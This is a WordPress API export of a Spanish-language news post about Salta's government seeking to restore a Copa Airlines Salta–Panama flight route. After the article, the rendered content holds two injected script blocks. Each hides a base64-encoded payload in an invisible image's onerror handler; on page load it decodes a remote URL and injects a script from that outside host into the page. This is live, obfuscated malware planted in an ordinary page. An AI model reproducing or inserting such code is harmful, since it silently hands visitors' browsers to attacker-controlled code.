{"id":2120,"date":"2023-01-24T11:41:12","date_gmt":"2023-01-24T14:41:12","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2120"},"modified":"2025-08-14T00:24:54","modified_gmt":"2025-08-14T03:24:54","slug":"el-gobierno-gestiona-el-regreso-de-la-conexion-aerea-salta-panama","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2120","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-gobierno-gestiona-el-regreso-de-la-conexion-aerea-salta-panama-87368\">El Gobierno gestiona el regreso de la conexi\u00f3n a\u00e9rea Salta &#8211; Panam\u00e1<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#8b6806\"><em>Copa Airlines inform\u00f3 la inclusi\u00f3n de esta ruta a\u00e9rea en la planificaci\u00f3n estrat\u00e9gica para el 2023. La presidenta del Inprotur Manuela Arancibia y el embajador argentino en Panam\u00e1 Marcelo Lucco mantuvieron una reuni\u00f3n con directivos de la empresa.<\/em><\/h4>\n\n\n\n<p>En el marco de las acciones delineadas por el plan estrat\u00e9gico \u201cLiderar\u201d el Ejecutivo provincial avanza en las gestiones vinculadas a la recuperaci\u00f3n de la ruta a\u00e9rea internacional Salta &#8211; Panam\u00e1. La vuelta a la operatividad de esta conexi\u00f3n implicar\u00eda fortalecer el turismo receptivo y el posicionamiento de la provincia en el mercado tur\u00edstico global.&nbsp;<\/p>\n\n\n\n<p>Es por estos motivos que autoridades provinciales y nacionales mantuvieron una reuni\u00f3n de trabajo con directivos de Copa Airlines. Fue ese el \u00e1mbito donde los referentes de la empresa aerocomercial se\u00f1alaron que dentro de la planificaci\u00f3n estrat\u00e9gica que la firma ha establecido para 2023 se incluye a Salta como un destino a operar dentro del cono sur.<\/p>\n\n\n\n<p>Al respecto el gobernador Gustavo S\u00e1enz indic\u00f3 que para Salta es una gran noticia que Copa haya avanzado en la inclusi\u00f3n de la lista de destinos a operar dentro de su planificaci\u00f3n, ya que esto es sin dudas una oportunidad que viene a refrendar el gran trabajo que la administraci\u00f3n realiza en materia de conectividad nacional e internacional.<\/p>\n\n\n\n<p>Cabe destacar que la provincia fue el destino seleccionado por Aerol\u00edneas Argentinas para poner en marcha la ruta directa Salta &#8211; San Pablo, servicio que ha mostrado desde su puesta en funcionamiento, durante el pasado julio de 2022, una gran demanda tanto para lo que tiene que ver con el turismo receptivo como el emisivo.<\/p>\n\n\n\n<p>La mesa de trabajo entre autoridades del sector p\u00fablico y privado estuvo integrada por la presidenta del Instituto de Promoci\u00f3n Tur\u00edstica provincial, Manuela Arancibia, el embajador argentino en Panam\u00e1, Marcelo Lucco, el director Senior de Planificaci\u00f3n y Alianza de la Compa\u00f1\u00eda Gabriel Varela y&nbsp; la directora de Relaciones Gubernamentales de Copa Mar\u00eda Luisa Navarro.<\/p>\n\n\n\n<p>\u201cLa labor del Inprotur Salta junto a su par nacional, Canciller\u00eda y Embajadas Argentinas nos ha permitido avanzar en este tipo de acciones de conectividad pero tambi\u00e9n de promoci\u00f3n tur\u00edstica internacional, todo esto resulta clave para que el turismo siga creciendo y cada vez sean m\u00e1s las personas que eligen a nuestro destino\u201d, destac\u00f3 Arancibia.<\/p>\n\n\n\n<p>Finalmente, el Embajador Lucco destac\u00f3 que \u201cvenimos trabajando hace bastante tiempo con el gobernador S\u00e1enz y su equipo para recuperar esta ruta que operaba hasta la pandemia en Salta. Su vuelta a la actividad ser\u00e1 un puente fundamental para poder recibir turistas de Estados Unidos, M\u00e9xico, Canad\u00e1 y Panam\u00e1 de manera directa\u201d.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-gobierno-gestiona-el-regreso-de-la-conexion-aerea-salta-panama-87368\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Copa Airlines inform\u00f3 la inclusi\u00f3n de esta ruta a\u00e9rea en la planificaci\u00f3n estrat\u00e9gica para el 2023. La presidenta del Inprotur Manuela Arancibia y el embajador argentino en Panam\u00e1 Marcelo Lucco mantuvieron una reuni\u00f3n con directivos de la empresa. En el marco de las acciones delineadas por el plan estrat\u00e9gico \u201cLiderar\u201d el Ejecutivo provincial avanza en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2121,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2120","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2120"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2120"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2120\/revisions"}],"predecessor-version":[{"id":7199,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2120\/revisions\/7199"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2121"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}